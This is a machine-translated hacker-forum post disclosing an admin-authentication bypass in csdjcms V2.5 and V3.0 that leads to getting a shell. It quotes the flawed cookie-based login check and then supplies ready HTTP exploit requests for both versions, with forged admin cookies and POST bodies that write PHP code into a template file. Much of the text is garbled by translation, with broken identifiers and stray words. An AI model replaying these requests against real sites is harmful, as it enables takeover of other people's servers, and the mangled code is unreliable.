/*************************************** * *************** // * Csdjcms <V 3.0 getshell Vulnerability/* ============ ===============/*:: Kn1f3/* E-Mail: 681796@qq.com/* ======================================== /************ **************************************** * ** // * 90sec team /******************************* * *********************/csdjcms is a singing-site CMS that YY hackers and YY pig-stream users like to use. I haven't posted on toast for a long time — resurrected. This time I'll release a vulnerability; a few friends on toast still remember me. First, the csdjcms V2.5 code.
// As usual, first look at: include_once ("include/install. php "); if (S_IsInstall = 0) {header (" Location: install/install. php ");} include_once (" include/label. php "); if (S_Webmode = 1 or! File_exists ("index.html") {// cache area $ cache_id = 'index _ '; if (! ($ Cache_opt-> start ($ cache_id) {echo GetTemp ("index.html", 0); $ cache_opt-> end () ;}} else {header ("Location: index.html ");} // now look at the input filtering: function SafeRequest ($ key, $ mode, $ isfilter ='') {set_magic_quotes_runtime (0); $ magic = get_magic_quotes_gpc (); switch ($ mode) {case 'post': $ value = isset ($ _ post [$ key])? $ Magic? Trim ($ _ POST [$ key]): addslashes (trim ($ _ POST [$ key]): ''; break; case 'get ': $ value = isset ($ _ GET [$ key])? $ Magic? Trim ($ _ GET [$ key]): addslashes (trim ($ _ GET [$ key]): ''; break; default: $ value = isset ($ _ POST [$ key])? $ Magic? Trim ($ _ POST [$ key]): addslashes (trim ($ _ POST [$ key]): ''; if ($ value = "") {$ value = isset ($ _ GET [$ key])? $ Magic? Trim ($ _ GET [$ key]): addslashes (trim ($ _ GET [$ key]): '';} break;} if ($ isfilter! = '') {$ Value = lib_replace_end_tag ($ value);} return $ value ;} // Submitted variables are passed through addslashes for security filtering. // After studying the source code for half a day, serious security problems turn up in the backend: include ".. /include/conn. php "; include ".. /include/function. php "; include" admin_version.php "; include" admin_loginstate.php "; // The problem lies in this file. // Entering it: if (empty ($ _ COOKIE ['s _ adminid']) {// first check whether the cookie s_adminid exists. echo "<script> window. location = 'admin _ login. php' </script> ";} elseif ($ _ COOKIE ['s _ Login ']! = Md5 ($ _ COOKIE ['s _ AdminID ']. $ _ COOKIE ['s _ AdminUserName ']. $ _ COOKIE ['s _ AdminPassWord ']. $ _ COOKIE ['s _ Permission ']) {// Here is the key problem: the login check only requires s_login to equal the md5 of the other four cookies, and every one of those values comes from the client; no server-side secret or stored credential takes part in the comparison, so the check can be satisfied without knowing any real credential. echo "<script> window. parent. 
location = 'admin _ login. php' </script> ";}// the background Permission judgment function SystemPer ($ Column) {if (empty ($ _ COOKIE ['s _ Permission ']) {die ("<script> jAlert ('Sorry, you are not authorized to perform this operation! ', 'Operation error', function (R) {window. location = 'javascript: history. go (-1) ';}) </script> ");} else {$ SystemPermission = explode (", ", $ _ COOKIE ['s _ Permission']); // permission judgment, separated by "," into an array $ StateOK = 0; $ ArrSystemPermission = count ($ SystemPermission); for ($ k = 0; $ k <$ ArrSystemPermission; $ k ++) {if ($ SystemPermission [$ k] ==$ Column) {// judge $ StateOK = 1 ;}} if ($ StateOK = 0) {die ("<script> jAlert ('Sorry, you are not authorized to perform this operation! ', 'Operation error', function (R) {window. location = 'javascript: history. go (-1) ';}) </script> ") ;}}// construct an obscene cookie // S_Permission //, 9, 10, 11,12, 13,14, 15 // S_Login // md5 (AdminID + AdminUserName + AdminPassWord + S_Permission) // S_AdminUserName // 1 // S_AdminPassWord // 1 // S_AdminID // 1 the background is successfully bypassed. // Check version 3.0.
<? Php # Name: PHP version of Cheng's music CMS management system v3.0 # Author: Cheng's <[email] web@chshcms.com [/email]> [QQ: 848769359] # Homepage: [url] http://www.chshcms.cn/ [/Url] $ CS_Path = $ _ SERVER ['php _ SELF ']; $ CS_Pathall = explode ("/", $ CS_Path); $ CS_Admin = $ CS_Pathall [1]. "/"; if (empty ($ _ COOKIE ['cs _ adminid']) {echo "<script> window. parent. location = '". CS_WebPath. $ CS_Admin. "login. php'; </script> ";} elseif ($ _ COOKIE ['cs _ login']! = Md5 ($ _ COOKIE ['cs _ adminid']. $ _ COOKIE ['cs _ adminusername']. $ _ COOKIE ['cs _ adminpassword']. $ _ COOKIE ['cs _ quanx']) {echo "<script> window. parent. location = '". CS_WebPath. $ CS_Admin. "login. php' </script> ";}// backend permission judgment function SystemPer ($ Column) {if (empty ($ _ COOKIE ['cs _ quanx']) {die ("<script> alert ('Sorry, you are not authorized to perform this operation! '); Window. location = 'javascript: history. go (-1); '</script> "); exit ();} else {$ SystemPermission = explode (",", $ _ COOKIE ['cs _ quanx']); $ StateOK = 0; $ ArrSystemPermission = count ($ SystemPermission); for ($ k = 0; $ k <$ ArrSystemPermission; $ k ++) {if ($ SystemPermission [$ k] ==$ Column) {$ StateOK = 1 ;}} if ($ StateOK = 0) {die ("<script> alert ('Sorry, you are not authorized to perform this operation! '); Window. location = 'javascript: history. go (-1); '</script> "); exit () ;}} use exp V2.5Host: www. xxx. comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv: 19.0) Gecko/20100101 Firefox/19.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateReferer: http://www.xxx.com/admin/admin_t ... 
Optional file1_artindex.html Cookie: S_Permission =, 15; S_Login = enabled; S_AdminUserName = 1; S_AdminPassWord = 1; S_AdminID = 1; cnzzdata=0884 = cnzz_eid % hour % 253A % 252F % hour % 26 ntime % 3D1364935608% 26cnzz_a % 3D19% 26 retime % hour % 26sin % 3 Dnone % 26 ltime % hour % 26 rtime % 3D0; bd1__firstime = 1365107576347; PHPSESSID = u6kd9d6f18fhfr9bi4if6agcj6Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 169 FileName = cs-bottom.php & content = % 3C % 3 Fphp + phpinfo + % 3F % 3E & folder = .. % 2 Fskins % 2 Findex % 2 Fhtml % 2F & tempname = % C4 % AC % C8 % CF % C4 % A3 % B0 % E6 & Submit = % D0 % DE % B8 % c4 % B5 % B1 % C7 % B0 % C4 % A3 % B0 % E5 ---------------------------------------------- exp V3.0: host: www. xxx. comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv: 19.0) Gecko/20100101 Firefox/19.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateReferer: http://www.xxx.com/admin/skins/s ...; Name = cs-bottom.phpCookie: CS_AdminID = 1; CS_AdminUserName = 1; CS_AdminPassWord = 1; CS_Quanx = 0_1, 1_1, 1_2, 1_3, 1_4, 1_5, 2_1, 2_2, 2_3, 2_4, 2_5, 2_6, 2_7, 3_1, 3_2, 3_3, 3_4, 4_1, 4_2, 4_3, 4_4, 4_5, 4_6, 4_7, 5_1, 5_2, 5_3, 5_4, 5_5, 6_1, 6_2, 6_3, 7_1, 7_2, 8_1, 8_2, 8_3, 8_4; CS_Login = listen; PHPSESSID = 48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283 = cnzz_eid % hour % 253A % 252F % hour % 26 ntime % 3D1364956519% 26cnzz_a % 3D1% 26 retime % hour % 26sin % 3D % 26 ltime % hour % 26 rtime % 3D0; bd1__firstime = 1365129335963 Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 57 name = cs-bottom.php & content = % 3C % 3 Fphp + phpinfo % 28% 29 + % 3F % 3E